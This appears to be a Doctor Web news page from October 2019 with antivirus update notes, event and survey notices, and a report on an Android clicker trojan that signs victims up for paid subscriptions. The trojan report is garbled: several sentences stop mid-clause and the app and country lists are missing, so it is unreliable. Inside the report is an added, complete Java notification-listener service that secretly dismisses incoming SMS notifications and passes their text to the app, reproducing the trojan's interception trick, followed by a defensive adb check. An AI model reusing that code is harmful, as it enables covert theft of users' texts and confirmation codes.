All the news
October 21, 2019
Changes made to Dr.Web Firewall for Windows driver:
- An issue causing user-defined application blocking rules to be ignored has been resolved.
Changes made to Dr.Web Scanning Engine:
- A scanning service defect has been eliminated: with the option to scan local networks enabled, files could not be restored to their previous versions from their shadow copies on the server.
Changes made to Dr.Web Anti-rootkit API:
- Enhanced threat detection and neutralisation routines.
Changes made to Dr.Web Protection for Windows:
- A problem has been fixed that rendered the self-protection module non-operational if Dallas Lock software was being used alongside Dr.Web in a system.
Changes made to the Dr.Web Net Filtering Service:
- Problems occurring when the Mikrotik router web interface was being accessed have been fixed;
- An issue preventing the Your Phone application on Windows 10 PCs from establishing a connection to Android devices has been resolved;
- Also resolved was a problem preventing other nodes from appearing in the network neighbourhood under Windows 10.
Changes made to Dr.Web for Outlook Plugin:
- The routines that block outgoing malicious attachments have been upgraded;
- Adjustments have been made to the routines that process emails with attachments to avoid SpIDer Guard file monitor issues.
The update will be performed automatically; however, a system reboot will be required.
October 17, 2019
Specifically, it addresses an issue preventing the UI from displaying properly in Dark Mode under macOS 10.14 and later.
To update Dr.Web Light for macOS to version 11.0.1, open the Mac App Store, go to the Updates section and click Update next to the product name. Dr.Web Light for macOS users can update the product free of charge.
Please note that Dr.Web Light for macOS has a limited set of features. To fully protect your Mac, use Dr.Web for macOS.
October 17, 2019
Virus analysts have identified several modifications of this malicious code, dubbed
In addition, all of the samples were protected with the commercial Jiagu packer, which hampers detection by anti-virus software and complicates code analysis. This made the trojan more likely to slip past Google Play's built-in security checks.
The virus writers also tried to disguise the trojan as well-known advertising and analytics libraries: once added to the host application, it embedded itself in the Facebook and Adjust SDKs, hiding among their components.
The clicker attacked users selectively; it did not perform any malicious actions if the potential victim was not residing in one of the attackers’ countries of interest.
Examples of apps carrying this trojan are shown below:
Upon installation and launch, the clicker (hereinafter, we will take its modification
If the user grants the requested permissions, the trojan is able to hide all notifications about incoming text messages and hook their contents.
Next, the clicker sends the technical data about the infected device to the command and control server and checks the serial number of the victim’s SIM card. If it corresponds to one of the target countries,
If the victim's SIM card is not registered in a country of interest, the trojan takes no further action and stops its malicious activity. The studied modifications attack residents of the following countries:
After transmitting the number,
After receiving a website address,
Although the clicker has no SMS permissions and cannot read text messages directly, it bypasses the restriction as follows. A trojan service monitors notifications posted by the default messaging application. When a message arrives, the service hides the system notification, extracts the message text from the notification's contents and passes it to the trojan's broadcast receiver. As a result, the user sees no notification of the incoming text and does not know what is happening. They learn of the subscription only when money is withdrawn from their account, or if they open the messaging app and see texts related to the premium service.
Doctor Web notified Google, and the detected malicious applications have been removed from Google Play. All known modifications of this clicker are successfully detected and removed by Dr.Web for Android and pose no threat to our users.
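The mechanism described above relies only on Android's public notification-listener API, not on any SMS permission. The following Android service is an added illustration of that technique written for this page; it is neither Doctor Web's code nor the trojan's own, and the class name and broadcast action are hypothetical. It assumes the service is declared in the manifest with `android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE"` and an intent filter for `android.service.notification.NotificationListenerService`, and that the user has enabled it under notification access.

```java
// Added illustration (not Doctor Web's code and not the trojan's own code): a
// NotificationListenerService that reproduces the mechanism described above
// using only public Android APIs. Class and action names are hypothetical.
import android.app.Notification;
import android.content.Intent;
import android.os.Bundle;
import android.provider.Telephony;
import android.service.notification.NotificationListenerService;
import android.service.notification.StatusBarNotification;

public class SmsNotificationRelay extends NotificationListenerService {

    // Hypothetical in-app broadcast action consumed by the app's own receiver.
    static final String ACTION_SMS_SEEN = "com.example.hypothetical.SMS_SEEN";

    @Override
    public void onNotificationPosted(StatusBarNotification sbn) {
        // React only to the app the user has set as the default SMS handler;
        // its notifications carry the sender and message text in the extras.
        String smsApp = Telephony.Sms.getDefaultSmsPackage(this);
        if (smsApp == null || !smsApp.equals(sbn.getPackageName())) {
            return;
        }

        Bundle extras = sbn.getNotification().extras;
        CharSequence sender = extras.getCharSequence(Notification.EXTRA_TITLE);
        CharSequence body = extras.getCharSequence(Notification.EXTRA_TEXT);

        // Step 1 of the described technique: dismiss the system notification
        // so the user never sees that a text (e.g. a confirmation code) arrived.
        cancelNotification(sbn.getKey());

        // Step 2: hand the recovered text to the app's broadcast receiver.
        // No SMS permission (READ_SMS / RECEIVE_SMS) is involved at any point,
        // so a permission review of the APK would not reveal SMS access.
        Intent seen = new Intent(ACTION_SMS_SEEN).setPackage(getPackageName());
        seen.putExtra("sender", sender == null ? "" : sender.toString());
        seen.putExtra("body", body == null ? "" : body.toString());
        sendBroadcast(seen);
    }
}
```

The practical consequence for defenders is that notification access, not SMS permission, is the capability to audit. On a device connected over USB, `adb shell settings get secure enabled_notification_listeners` lists the listener components the user has enabled; any entry that is not a known wearable, assistant or automation app deserves a closer look, and the same list is visible to the user under the notification access screen in Settings.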
#Android, #Google_Play, #clicker, #paid_subscription
October 16, 2019
Usually, when it comes to threats related to video games, the first thing we talk about is stolen accounts. However, there is another kind of danger that many security researchers overlook: an entire underground industry is at work promoting game servers, more often than not by illegal means, including infecting game clients. The Trojan.Belonard botnet was designed to promote servers running Counter Strike 1.6.
On November 8, at the Conference, Igor Zdobnov, Doctor Web's chief malware researcher, and his colleague Ivan Korolev will talk at length about the Trojan.Belonard threat. Doctor Web has conducted thorough research on this threat and published the results on its website in March 2019. By leveraging a Counter Strike client vulnerability, the botnet makers herded infected machines into their infrastructure in order to promote game servers for a fee. Thanks to the efforts of our security researchers, Dr.Web now detects all of the Trojan's modules, so it poses no threat to users whose systems are protected by Dr.Web.
#video_games #conferences #botnet
October 14, 2019
Many users, especially inexperienced ones, opt not to install the firewall when installing Dr.Web anti-virus products because this component periodically displays messages that require a response, supposedly distracting users so often that they cannot work in peace on the Internet.
Dr.Web Firewall does indeed operate according to the rules and settings its user configures. Usually, the rules are established in a "dialogue" between the user and the application: the firewall asks whether a program may access the network, and the user decides whether to allow the connection or not. That is why it is important to be meticulous when working with the firewall: programs should only be given the network access they actually need.
The new project in the “Configure Dr.Web” series is devoted to properly configuring Dr.Web Firewall, and all Dr.Web users are invited to participate. We invite IT professionals involved in administering Dr.Web products for business, as well as Dr.Web Security Space and Dr.Web Anti-virus users, to test how well they know how to configure this Dr.Web component. Answering the survey questions will help participants learn more about the firewall’s features and show them that it is an important tool for keeping them safe on the Internet. Doctor Web will award each participant with 100 Dr.Weblings as a “thank you” for spending time answering the survey questions.
#firewall_configuration #Configure_Dr.Web #survey
October 10, 2019
The updated modules include Dr.Web Anti-rootkit API (126.96.36.199910080), Dr.Web Scanning Engine (188.8.131.52910020), and Dr.Web Protection for Windows (12.05.01.09250).
In addition, the anti-rootkit scan false positive REG:SUSPICIOUS.UserinitCorrupted has been eliminated. Furthermore, an anti-rootkit module issue that made it difficult to neutralise threats discovered in Task Scheduler has been resolved.
Both the paid and the free editions of the utility have been updated.